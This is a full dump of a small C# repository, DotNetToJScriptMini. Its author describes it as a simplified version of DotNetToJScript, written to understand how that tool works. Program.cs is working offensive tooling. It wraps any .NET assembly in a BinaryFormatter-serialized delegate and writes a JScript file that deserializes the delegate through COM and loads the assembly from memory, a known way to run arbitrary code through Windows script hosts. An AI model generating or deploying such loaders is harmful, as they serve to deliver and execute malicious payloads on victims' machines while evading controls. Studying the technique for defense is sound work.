├── .gitignore
├── .vs
└── DotNetToJScriptMini
│ └── v16
│ └── .suo
├── DotNetToJScriptMini.sln
├── DotNetToJScriptMini
├── App.config
├── DotNetToJScriptMini.csproj
├── Program.cs
├── Properties
│ └── AssemblyInfo.cs
├── bin
│ └── Release
│ │ ├── DotNetToJScriptMini.exe.config
│ │ └── DotNetToJScriptMini.pdb
└── obj
│ ├── Debug
│ ├── .NETFramework,Version=v4.5.AssemblyAttributes.cs
│ ├── DesignTimeResolveAssemblyReferencesInput.cache
│ └── DotNetToJScriptMini.csprojAssemblyReference.cache
│ └── Release
│ ├── .NETFramework,Version=v4.5.AssemblyAttributes.cs
│ ├── DesignTimeResolveAssemblyReferencesInput.cache
│ ├── DotNetToJScriptMini.csproj.CoreCompileInputs.cache
│ ├── DotNetToJScriptMini.csproj.FileListAbsolute.txt
│ ├── DotNetToJScriptMini.csprojAssemblyReference.cache
│ └── DotNetToJScriptMini.pdb
└── README.md
/.gitignore:
--------------------------------------------------------------------------------
1 | *.exe
2 | *.dll
3 |
--------------------------------------------------------------------------------
/.vs/DotNetToJScriptMini/v16/.suo:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/KINGSABRI/DotNetToJScriptMini/1e0fd3ccbd649a27b546d14f1954407efd0bb828/.vs/DotNetToJScriptMini/v16/.suo
--------------------------------------------------------------------------------
/DotNetToJScriptMini.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 16
4 | VisualStudioVersion = 16.0.30114.105
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "DotNetToJScriptMini", "DotNetToJScriptMini\DotNetToJScriptMini.csproj", "{D502E9D0-7B4E-46C0-A59B-EC84D9AE873E}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|Any CPU = Debug|Any CPU
11 | Release|Any CPU = Release|Any CPU
12 | EndGlobalSection
13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | {D502E9D0-7B4E-46C0-A59B-EC84D9AE873E}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
15 | {D502E9D0-7B4E-46C0-A59B-EC84D9AE873E}.Debug|Any CPU.Build.0 = Debug|Any CPU
16 | {D502E9D0-7B4E-46C0-A59B-EC84D9AE873E}.Release|Any CPU.ActiveCfg = Release|Any CPU
17 | {D502E9D0-7B4E-46C0-A59B-EC84D9AE873E}.Release|Any CPU.Build.0 = Release|Any CPU
18 | EndGlobalSection
19 | GlobalSection(SolutionProperties) = preSolution
20 | HideSolutionNode = FALSE
21 | EndGlobalSection
22 | GlobalSection(ExtensibilityGlobals) = postSolution
23 | SolutionGuid = {9283E228-0479-474B-A7C2-7A2114713E8F}
24 | EndGlobalSection
25 | EndGlobal
26 |
--------------------------------------------------------------------------------
/DotNetToJScriptMini/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/DotNetToJScriptMini/DotNetToJScriptMini.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | AnyCPU
7 | {D502E9D0-7B4E-46C0-A59B-EC84D9AE873E}
8 | Exe
9 | DotNetToJScriptMini
10 | DotNetToJScriptMini
11 | v4.5
12 | 512
13 | true
14 |
15 |
16 | AnyCPU
17 | true
18 | full
19 | false
20 | bin\Debug\
21 | DEBUG;TRACE
22 | prompt
23 | 4
24 |
25 |
26 | AnyCPU
27 | pdbonly
28 | true
29 | bin\Release\
30 | TRACE
31 | prompt
32 | 4
33 |
34 |
35 |
36 |
37 |
38 |
39 |
40 |
41 |
42 |
43 |
44 |
45 |
46 |
47 |
48 |
49 |
50 |
51 |
52 |
--------------------------------------------------------------------------------
/DotNetToJScriptMini/Program.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.IO;
4 | using System.Linq;
5 | using System.Reflection;
6 | using System.Runtime.Remoting.Messaging;
7 | using System.Runtime.Serialization.Formatters.Binary;
8 | using System.Text;
9 | using System.Xml.Schema;
10 |
11 | namespace DotNetToJScriptMini
12 | {
13 | // The original research behind Binaryformatter and serializ/deserialize Delegate by James Forshaw (@tiraniddo).
14 | // From that research DotNetToJScript has born.
15 | // https://googleprojectzero.blogspot.com/2017/08/bypassing-virtualbox-process-hardening.html
16 | //
17 | class Program
18 | {
19 | ///
20 | /// Assembly functions
21 | ///
22 | static object BuildLoaderDelegate(byte[] assembly)
23 | {
24 | Console.WriteLine($" -> Delegate");
25 | Console.WriteLine(" " + typeof(XmlValueGetter));
26 | Console.WriteLine(" " + typeof(Assembly).GetMethod("Load", new Type[] { typeof(byte[]) }));
27 |
28 | // Create a bound delegate which will load our assembly from a byte array.
29 | // Delegate.CreateDelegate(Type, Object, Type)
30 | // https://docs.microsoft.com/en-us/dotnet/api/system.delegate.createdelegate?view=net-5.0
31 | // https://docs.microsoft.com/en-us/dotnet/framework/reflection-and-codedom/how-to-hook-up-a-delegate-using-reflection
32 | // https://github.com/TheWover/beercode/blob/master/loaders/DeserializeAssembly.cs010
33 | Delegate res = Delegate.CreateDelegate(
34 | typeof(XmlValueGetter),
35 | assembly,
36 | typeof(Assembly).GetMethod("Load", new Type[] { typeof(byte[]) }) // Equeals: System.Reflection.Assembly.Assembly.Load()
37 | );
38 |
39 | // Create a COM invokable delegate to call the loader. Abuses contra-variance
40 | // to make an array of headers to an array of objects (which we'll just pass
41 | // null to anyway).
42 | Console.WriteLine($" -> Create a COM inovkable delegate to call the loader");
43 | return new HeaderHandler(res.DynamicInvoke);
44 | }
45 |
46 |
47 | ///
48 | /// JScript Generation
49 | ///
50 | static string generateScript(byte[] serialized_object, string entry_class_name)
51 | {
52 | string[] lines = BinToBase64Lines(serialized_object);
53 | var encoded_serialized_object = String.Join("+" + Environment.NewLine, lines);
54 |
55 |
56 | string functions =
57 | "function setversion() {\n" +
58 | " var shell = new ActiveXObject('WScript.Shell');\n" +
59 | " ver = 'v4.0.30319';\n" +
60 | " try {\n" +
61 | " shell.RegRead('HKLM\\\\SOFTWARE\\\\Microsoft\\\\.NETFramework\\\\v4.0.30319\\\\');\n" +
62 | " } catch(e) { \n" +
63 | " ver = 'v2.0.50727';\n" +
64 | " }\n" +
65 | " shell.Environment('Process')('COMPLUS_Version') = ver;\n" +
66 | "}" +
67 | "\n\n" +
68 | "function debug(s) {}\n" +
69 | "function base64ToStream(b) {\n" +
70 | " var enc = new ActiveXObject(\"System.Text.ASCIIEncoding\");\n" +
71 | " var length = enc.GetByteCount_2(b);\n" +
72 | " var ba = enc.GetBytes_4(b);\n" +
73 | " var transform = new ActiveXObject(\"System.Security.Cryptography.FromBase64Transform\");\n" +
74 | " ba = transform.TransformFinalBlock(ba, 0, length);\n" +
75 | " var ms = new ActiveXObject(\"System.IO.MemoryStream\");\n" +
76 | " ms.Write(ba, 0, (length / 4) * 3);\n" +
77 | " ms.Position = 0;\n" +
78 | " return ms;\n" +
79 | "}" +
80 | "\n\n" +
81 | $"var serialized_obj = {encoded_serialized_object};\n" +
82 | $"var entry_class = '{entry_class_name}';" +
83 | "\n\n" +
84 | "try {\n" +
85 | " setversion();\n" +
86 | " var stm = base64ToStream(serialized_obj);\n" +
87 | " var fmt = new ActiveXObject('System.Runtime.Serialization.Formatters.Binary.BinaryFormatter');\n" +
88 | " var al = new ActiveXObject('System.Collections.ArrayList');\n" +
89 | " var d = fmt.Deserialize_2(stm);\n" +
90 | " al.Add(undefined);\n" +
91 | " var o = d.DynamicInvoke(al.ToArray()).CreateInstance(entry_class);" +
92 | " \n\n" +
93 | "} catch (e) {\n" +
94 | " debug(e.message);\n" +
95 | "}\n\n";
96 |
97 |
98 | return functions;
99 | }
100 |
101 |
102 | ///
103 | /// Helper functions
104 | ///
105 | public static string[] BinToBase64Lines(byte[] serialized_object)
106 | {
107 | int ofs = serialized_object.Length % 3;
108 | if (ofs != 0)
109 | {
110 | int length = serialized_object.Length + (3 - ofs);
111 | Array.Resize(ref serialized_object, length);
112 | }
113 |
114 | string base64 = Convert.ToBase64String(serialized_object, Base64FormattingOptions.InsertLineBreaks);
115 | var b64Formated = base64.Split(new string[] { Environment.NewLine }, StringSplitOptions.None).Select(s => String.Format("\"{0}\"", s)).ToArray();
116 |
117 | return b64Formated;
118 | }
119 |
120 | static void Summary(string asm = "", string cls = "", string output = "")
121 | {
122 | Console.WriteLine("\n=[ Summary ]==================");
123 | Console.WriteLine($" Assembly : {asm}");
124 | Console.WriteLine($" Entry class name: {cls}");
125 | Console.WriteLine($" Output JS file : {output}");
126 | Console.WriteLine("==============================\n");
127 | }
128 |
129 | static HashSet GetValidClasses(byte[] assembly)
130 | {
131 | Assembly asm = Assembly.Load(assembly);
132 | var validClasses = new HashSet(asm.GetTypes().Where(t => t.IsPublic && t.GetConstructor(new Type[0]) != null).Select(t => t.FullName));
133 | return validClasses;
134 | }
135 |
136 | static void Main(string[] args)
137 | {
138 | string assembly_path;
139 | string entryClassName;
140 | string outputJS;
141 | var myname = System.AppDomain.CurrentDomain.FriendlyName;
142 |
143 | if (args.Length == 3)
144 | {
145 | assembly_path = args[0];
146 | entryClassName = args[1];
147 | outputJS = Path.GetFileNameWithoutExtension(args[2]) + ".js";
148 | }
149 | else if (args.Length == 2)
150 | {
151 | assembly_path = args[0];
152 | entryClassName = args[1];
153 | outputJS = Path.GetFileNameWithoutExtension(assembly_path) + ".js";
154 | }
155 | else if (args.Length == 1)
156 | {
157 | assembly_path = args[0];
158 | entryClassName = "TestClass";
159 | outputJS = Path.GetFileNameWithoutExtension(assembly_path) + ".js";
160 | }
161 | else
162 | {
163 | Console.WriteLine("[*] Usage:");
164 | Console.WriteLine($"{myname} [OUTPUTJS]\n");
165 | return;
166 | }
167 |
168 | Summary(assembly_path, entryClassName, outputJS);
169 |
170 | if (!File.Exists(assembly_path))
171 | {
172 | Console.Error.WriteLine($"[x] Error: File not found! {assembly_path}");
173 | Console.WriteLine($"{myname} [OUTPUTJS]\n");
174 | Environment.Exit(1);
175 | }
176 |
177 | // Read the binary
178 | byte[] assembly = File.ReadAllBytes(assembly_path);
179 |
180 | // Try to find the entry class or enumerate all public classes
181 | try
182 | {
183 | HashSet valid_classes = GetValidClasses(assembly);
184 | if (!valid_classes.Contains(entryClassName))
185 | {
186 | Console.Error.WriteLine($"[x] Error: Class '{entryClassName}' not found in assembly.");
187 | if (valid_classes.Count == 0)
188 | {
189 | Console.Error.WriteLine($"[x] Error: Assembly doesn't contain any public, default constructable classes");
190 | }
191 | else
192 | {
193 | Console.Error.WriteLine($"[!] Use one of the following valid classes from the binary as a second arguement:");
194 | foreach (string name in valid_classes)
195 | {
196 | Console.Error.WriteLine($" - {name}");
197 | }
198 |
199 | Console.WriteLine($"\n{myname} [OUTPUTJS]\n");
200 | }
201 | Environment.Exit(1);
202 | }
203 | }
204 | catch (Exception e)
205 | {
206 | Console.Error.WriteLine($"[x] Error: loading assembly information.");
207 | Console.WriteLine(e);
208 | Environment.Exit(1);
209 | }
210 |
211 | Console.WriteLine($"[+] Found a valid class '{entryClassName}'");
212 | // Serialize an object
213 | BinaryFormatter formatter = new BinaryFormatter();
214 | // To serialize xxxx object you must first open a stream for writing.
215 | MemoryStream memoryStream = new MemoryStream();
216 | Console.WriteLine($"[+] Serilizing the assembly object");
217 | formatter.Serialize(memoryStream, BuildLoaderDelegate(assembly));
218 |
219 | Console.WriteLine($"[+] Generating JS file '{outputJS}'");
220 | string jScriptCode = generateScript(memoryStream.ToArray(), entryClassName);
221 | File.WriteAllText(outputJS, jScriptCode, new UTF8Encoding(false));
222 | }
223 | }
224 | }
225 |
--------------------------------------------------------------------------------
/DotNetToJScriptMini/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("DotNetToJScriptMini")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("DotNetToJScriptMini")]
13 | [assembly: AssemblyCopyright("Copyright © 2021")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("d502e9d0-7b4e-46c0-a59b-ec84d9ae873e")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/DotNetToJScriptMini/bin/Release/DotNetToJScriptMini.exe.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/DotNetToJScriptMini/bin/Release/DotNetToJScriptMini.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/KINGSABRI/DotNetToJScriptMini/1e0fd3ccbd649a27b546d14f1954407efd0bb828/DotNetToJScriptMini/bin/Release/DotNetToJScriptMini.pdb
--------------------------------------------------------------------------------
/DotNetToJScriptMini/obj/Debug/.NETFramework,Version=v4.5.AssemblyAttributes.cs:
--------------------------------------------------------------------------------
1 | //
2 | using System;
3 | using System.Reflection;
4 | [assembly: global::System.Runtime.Versioning.TargetFrameworkAttribute(".NETFramework,Version=v4.5", FrameworkDisplayName = ".NET Framework 4.5")]
5 |
--------------------------------------------------------------------------------
/DotNetToJScriptMini/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/KINGSABRI/DotNetToJScriptMini/1e0fd3ccbd649a27b546d14f1954407efd0bb828/DotNetToJScriptMini/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache
--------------------------------------------------------------------------------
/DotNetToJScriptMini/obj/Debug/DotNetToJScriptMini.csprojAssemblyReference.cache:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/KINGSABRI/DotNetToJScriptMini/1e0fd3ccbd649a27b546d14f1954407efd0bb828/DotNetToJScriptMini/obj/Debug/DotNetToJScriptMini.csprojAssemblyReference.cache
--------------------------------------------------------------------------------
/DotNetToJScriptMini/obj/Release/.NETFramework,Version=v4.5.AssemblyAttributes.cs:
--------------------------------------------------------------------------------
1 | //
2 | using System;
3 | using System.Reflection;
4 | [assembly: global::System.Runtime.Versioning.TargetFrameworkAttribute(".NETFramework,Version=v4.5", FrameworkDisplayName = ".NET Framework 4.5")]
5 |
--------------------------------------------------------------------------------
/DotNetToJScriptMini/obj/Release/DesignTimeResolveAssemblyReferencesInput.cache:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/KINGSABRI/DotNetToJScriptMini/1e0fd3ccbd649a27b546d14f1954407efd0bb828/DotNetToJScriptMini/obj/Release/DesignTimeResolveAssemblyReferencesInput.cache
--------------------------------------------------------------------------------
/DotNetToJScriptMini/obj/Release/DotNetToJScriptMini.csproj.CoreCompileInputs.cache:
--------------------------------------------------------------------------------
1 | 6a7ab24d74b7e25a7ffff290d4fe2dc8916038a2
2 |
--------------------------------------------------------------------------------
/DotNetToJScriptMini/obj/Release/DotNetToJScriptMini.csproj.FileListAbsolute.txt:
--------------------------------------------------------------------------------
1 | Z:\CSharp\DotNetToJScriptMini\DotNetToJScriptMini\bin\Release\DotNetToJScriptMini.exe.config
2 | Z:\CSharp\DotNetToJScriptMini\DotNetToJScriptMini\bin\Release\DotNetToJScriptMini.exe
3 | Z:\CSharp\DotNetToJScriptMini\DotNetToJScriptMini\bin\Release\DotNetToJScriptMini.pdb
4 | Z:\CSharp\DotNetToJScriptMini\DotNetToJScriptMini\obj\Release\DotNetToJScriptMini.csprojAssemblyReference.cache
5 | Z:\CSharp\DotNetToJScriptMini\DotNetToJScriptMini\obj\Release\DotNetToJScriptMini.csproj.CoreCompileInputs.cache
6 | Z:\CSharp\DotNetToJScriptMini\DotNetToJScriptMini\obj\Release\DotNetToJScriptMini.exe
7 | Z:\CSharp\DotNetToJScriptMini\DotNetToJScriptMini\obj\Release\DotNetToJScriptMini.pdb
8 |
--------------------------------------------------------------------------------
/DotNetToJScriptMini/obj/Release/DotNetToJScriptMini.csprojAssemblyReference.cache:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/KINGSABRI/DotNetToJScriptMini/1e0fd3ccbd649a27b546d14f1954407efd0bb828/DotNetToJScriptMini/obj/Release/DotNetToJScriptMini.csprojAssemblyReference.cache
--------------------------------------------------------------------------------
/DotNetToJScriptMini/obj/Release/DotNetToJScriptMini.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/KINGSABRI/DotNetToJScriptMini/1e0fd3ccbd649a27b546d14f1954407efd0bb828/DotNetToJScriptMini/obj/Release/DotNetToJScriptMini.pdb
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # DotNetToJScriptMini
2 | A simplified (abstract) version of DotNetToJScript to create a JScript file which loads a .NET v2 assembly from memory.
3 |
4 | I created this script to simplify understanding how DotNetToJScript works.
5 |
6 | ## Usage
7 | ```
8 | [*] Usage:
9 | DotNetToJScriptMini.exe [OUTPUTJS]
10 | ```
11 | example:
12 | ```
13 | DotNetToJScriptMini.exe .\ExampleAssembly.dll TestClass mini.js
14 | ```
15 |
--------------------------------------------------------------------------------